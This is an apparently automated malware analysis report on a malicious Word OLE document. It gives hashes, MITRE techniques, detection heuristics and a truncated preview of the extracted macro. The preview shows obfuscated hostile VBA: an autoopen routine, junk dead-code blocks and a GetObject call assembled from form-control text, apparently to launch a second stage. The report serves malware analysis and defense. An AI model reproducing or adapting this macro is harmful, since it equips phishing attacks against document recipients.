Office (OLE) malware analysis — malicious · 13ffc59fa86288c4

MALICIOUS

Office (OLE)

205.5 KB Created: 2019-04-03 21:02:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 7b97eeed662255206da79c378ba2b226 SHA-1: 1ddf1a0bda0f0bb9a08e3b88f82e6cb174535617 SHA-256: 13ffc59fa86288c408cec9b7834fce147cdfd462064e3bc605df8d42ed398e1e

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a legacy WordBasic autoopen macro. The presence of the 'autoopen' marker and the 'GetObject' call within the VBA p-code strongly suggests that this macro is designed to execute automatically upon opening the document. This macro likely serves to download and execute a second-stage payload, a common technique for initial compromise.

Heuristics 7

ClamAV: Doc.Malware.00536d-6931222-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6931222-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23724 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	23724 bytes
SHA-256: `483b447b822224b679f12772efa3053f24f59ccdd2bb76164c9694c70ce83511`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "aQAXAUX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "iA4DAZAA" Attribute VB_Base = "0{6B25BD22-9C99-4623-BD61-2C2FF7B9EAD8}{905F43FB-7DDE-4271-BCDF-F9FF060D1EF6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "bxA_AAx" Attribute VB_Base = "0{8396AB1A-0A0C-41C4-A23F-2D336DBF4567}{58F599E4-3279-4C87-9DCA-3DBC78A9510A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "UAAwAUA" Function B4DxxC() If 719222276 = 4113042 Then cCxGAAD _ = 373399491 - Asc(974483300) / 563509206 / _ 602623635 * 111998884 - Rnd(RCXDAo / CVar(429638769)) dCUBXQGA = dB_AQAA + _ Int(546887863) * wxAUCcG - SwDBD_A + (95616105 * 753352500) End If If 776202244 = 156789423 Then EDUBw1_ _ = 541993349 - Asc(871210921) / 522573167 / _ 264034843 * 660681505 - Rnd(cDAAAk / CVar(967989543)) j1AUAAB = CBAAQA + _ Int(465614167) * fCAQwUU - VkAZQGQ + (780554797 * 266939200) End If End Function Sub autoopen() VDUADAx End Sub Function VDUADAx() On Error Resume Next If 860065393 = 497303847 Then lwDxQA _ = 605887667 - Asc(779106947) / 994084501 / _ 972368958 * 28694341 - Rnd(wUZ_AABA / CVar(375110659)) IkZAUAG = bQwQA_ + _ Int(924162441) * zQxAADcU - IDGDAB + (840285052 * 650638086) End If If 956041707 = 80812680 Then OAUXAxA_ _ = 436468480 - Asc(205560270) / 581533462 / _ 20647257 * 891633797 - Rnd(dABAXAA / CVar(686180320)) XoAoAD = mABAQAUQ + _ Int(360136155) * jAAZXDGk - zwBQCo + (134540422 * 514583384) End If If 819241074 = 150583035 Then VZBoQUc _ = 176420080 - Asc(593669658) / 717229922 / _ 979495612 * 156031694 - Rnd(qkxAZA / CVar(885932327)) JwwABXAX = YwAZAQ + _ Int(76747132) * AQA4kXA - iAAZAB + (646819924 * 659464060) End If Set GGDAZUAx = GetObject(iA4DAZAA.RcAZxA1.Text + bxA_AAx.wBU1U4A + iA4DAZAA.RcAZxA1.ControlTipText) If 938901773 = 419009523 Then EBcAAc _ = 824893823 - Asc(192667517) / 59813052 / _ 260216089 * 64228704 - Rnd(YG4AAAG / CVar(717028555)) lAAU_c = jAo4_UAX + _ Int(411087057) * LwDkwQA - B4wAAQ1D + (539907916 * 579717901) End If If 225264589 = 705557556 Then RAxA1ADA _ = 667118813 - Asc(312430838) / 580152966 / _ 949425436 * 891934652 - Rnd(wAQCAA / CVar(793989335)) pxBCwAAC = I_k4BB + _ Int(318502179) * OGXQUCA - nAAQAAx + (269066312 * 172363536) End If If 195187 = 195187 Then If 903110538 = 203163801 Then uXXx4Zc _ = 815318205 - Asc(419138346) / 32487252 / _ 344779435 * 451077846 - Rnd(wQZQAAC / CVar(299446192)) V_cD_DA = LUGA1Ao + _ Int(135559263) * UXAAoo - TDoQ4x + (704715446 * 602930089) End If If 430872103 = 672460083 Then ODAABc _ = 613860897 - Asc(792174377) / 168607481 / _ 991250284 * 803834410 - Rnd(Lc44Ak / CVar(290914548)) YQUkBAG = dAGAAw + _ Int(265467400) * hBAGwA - PAQ4BAQ + (751548478 * 621320211) End If GGDAZUAx. _ ShOwWiNdOw = iA4DAZAA.qZADAcw - iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw If 593514299 = 109045821 Then iDXDxXD _ = 859713358 - Asc(788985564) / 515069524 / _ 470050502 * 744653653 - Rnd(RBAUAoA / CVar(522555622)) JDD1CXU = rCAQQCA1 + _ Int(280452044) * o_AA4U - XGBAXZ + (883953875 * 908624931) End If If 353077305 = 129647101 Then vQAUQBAZ _ = 833070433 - Asc(531067672) / 68802721 / _ 633560649 * 302348481 - Rnd(qAXAxA / CVar(581482800)) OAAUQAA = LUQUGADw + _ Int(357308747) * LQxAUkwA - QADAAcA + (920509862 * 753648465) End If If 345112841 = 463205560 Then pZQAABAA _ = 355378688 ... (truncated)

SHA-256: 483b447b822224b679f12772efa3053f24f59ccdd2bb76164c9694c70ce83511

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "aQAXAUX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iA4DAZAA"
Attribute VB_Base = "0{6B25BD22-9C99-4623-BD61-2C2FF7B9EAD8}{905F43FB-7DDE-4271-BCDF-F9FF060D1EF6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "bxA_AAx"
Attribute VB_Base = "0{8396AB1A-0A0C-41C4-A23F-2D336DBF4567}{58F599E4-3279-4C87-9DCA-3DBC78A9510A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UAAwAUA"
Function B4DxxC()
   If 719222276 = 4113042 Then
   cCxGAAD _
= 373399491 - Asc(974483300) / 563509206 / _
602623635 * 111998884 - Rnd(RCXDAo / CVar(429638769))
   dCUBXQGA = dB_AQAA + _
Int(546887863) * wxAUCcG - SwDBD_A + (95616105 * 753352500)
End If
   If 776202244 = 156789423 Then
   EDUBw1_ _
= 541993349 - Asc(871210921) / 522573167 / _
264034843 * 660681505 - Rnd(cDAAAk / CVar(967989543))
   j1AUAAB = CBAAQA + _
Int(465614167) * fCAQwUU - VkAZQGQ + (780554797 * 266939200)
End If
End Function
Sub autoopen()
VDUADAx
End Sub
Function VDUADAx()
On Error Resume Next
   If 860065393 = 497303847 Then
   lwDxQA _
= 605887667 - Asc(779106947) / 994084501 / _
972368958 * 28694341 - Rnd(wUZ_AABA / CVar(375110659))
   IkZAUAG = bQwQA_ + _
Int(924162441) * zQxAADcU - IDGDAB + (840285052 * 650638086)
End If
   If 956041707 = 80812680 Then
   OAUXAxA_ _
= 436468480 - Asc(205560270) / 581533462 / _
20647257 * 891633797 - Rnd(dABAXAA / CVar(686180320))
   XoAoAD = mABAQAUQ + _
Int(360136155) * jAAZXDGk - zwBQCo + (134540422 * 514583384)
End If
   If 819241074 = 150583035 Then
   VZBoQUc _
= 176420080 - Asc(593669658) / 717229922 / _
979495612 * 156031694 - Rnd(qkxAZA / CVar(885932327))
   JwwABXAX = YwAZAQ + _
Int(76747132) * AQA4kXA - iAAZAB + (646819924 * 659464060)
End If
Set GGDAZUAx = GetObject(iA4DAZAA.RcAZxA1.Text + bxA_AAx.wBU1U4A + iA4DAZAA.RcAZxA1.ControlTipText)
   If 938901773 = 419009523 Then
   EBcAAc _
= 824893823 - Asc(192667517) / 59813052 / _
260216089 * 64228704 - Rnd(YG4AAAG / CVar(717028555))
   lAAU_c = jAo4_UAX + _
Int(411087057) * LwDkwQA - B4wAAQ1D + (539907916 * 579717901)
End If
   If 225264589 = 705557556 Then
   RAxA1ADA _
= 667118813 - Asc(312430838) / 580152966 / _
949425436 * 891934652 - Rnd(wAQCAA / CVar(793989335))
   pxBCwAAC = I_k4BB + _
Int(318502179) * OGXQUCA - nAAQAAx + (269066312 * 172363536)
End If
If 195187 = 195187 Then
   If 903110538 = 203163801 Then
   uXXx4Zc _
= 815318205 - Asc(419138346) / 32487252 / _
344779435 * 451077846 - Rnd(wQZQAAC / CVar(299446192))
   V_cD_DA = LUGA1Ao + _
Int(135559263) * UXAAoo - TDoQ4x + (704715446 * 602930089)
End If
   If 430872103 = 672460083 Then
   ODAABc _
= 613860897 - Asc(792174377) / 168607481 / _
991250284 * 803834410 - Rnd(Lc44Ak / CVar(290914548))
   YQUkBAG = dAGAAw + _
Int(265467400) * hBAGwA - PAQ4BAQ + (751548478 * 621320211)
End If
GGDAZUAx. _
ShOwWiNdOw = iA4DAZAA.qZADAcw - iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw + iA4DAZAA.qZADAcw
   If 593514299 = 109045821 Then
   iDXDxXD _
= 859713358 - Asc(788985564) / 515069524 / _
470050502 * 744653653 - Rnd(RBAUAoA / CVar(522555622))
   JDD1CXU = rCAQQCA1 + _
Int(280452044) * o_AA4U - XGBAXZ + (883953875 * 908624931)
End If
   If 353077305 = 129647101 Then
   vQAUQBAZ _
= 833070433 - Asc(531067672) / 68802721 / _
633560649 * 302348481 - Rnd(qAXAxA / CVar(581482800))
   OAAUQAA = LUQUGADw + _
Int(357308747) * LQxAUkwA - QADAAcA + (920509862 * 753648465)
End If
   If 345112841 = 463205560 Then
   pZQAABAA _
= 355378688
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.